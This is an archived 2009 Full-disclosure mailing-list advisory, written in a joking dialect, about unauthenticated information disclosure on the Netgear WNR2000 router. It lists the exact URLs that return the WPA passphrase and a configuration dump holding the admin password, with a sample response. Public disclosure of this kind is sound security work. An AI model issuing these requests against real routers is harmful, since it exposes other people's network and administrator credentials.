[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Information disclosure on Netgear WNR2000

To: full-disclosure@xxxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Information disclosure on Netgear WNR2000
From: Jean Trolleur <sigtstp@xxxxxxxxx>
Date: Tue, 18 Aug 2009 13:27:41 -0600

Dere is several mino' vulnerabilities on de Netgear WNR2000 wireless
routa' runnin' firmware 1.2.0.8.

1. Unaudenticated disclosho' man uh WPA/WPA2 passwo'd, dig dis: Simply
request widout audenticashun:

http://netgear/router-info.htm
http://netgear/cgi-bin/router-info.htm

De routa' gots'ta respond wid:

DeviceID:WNR2000;
HardwareVersion:;
FirmwareVersion:V1.2.0.8NA;
WLAN-Security:SecurityMode=WPA-PSK-Mixed;WPAPassPhrase=omfgwtfwtfwtf

2. Unaudenticated disclosho' man uh administrato' passwo'd Simply
request widout audenticashun:

http://netgear/cgi-bin/NETGEAR_WNR2000.cfg

Skip de fust 128 bytes and ya' gots some tar dump uh de stashsystem.
WORD! Reverse engineerin' de weak admin passwo'd audenticashun scheme
be left as an 'esercise t'de eyeballer. Ah be baaad...

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: [Full-disclosure] Cisco Security Advisory: Cisco Security Advisory: Cisco IOS XR Software Border Gateway Protocol Vulnerability
Next by Date: [Full-disclosure] False statements made about security researcher n3td3v
Previous by thread: [Full-disclosure] Cisco Security Advisory: Cisco Security Advisory: Cisco IOS XR Software Border Gateway Protocol Vulnerability
Next by thread: [Full-disclosure] False statements made about security researcher n3td3v
Index(es):
- Date
- Thread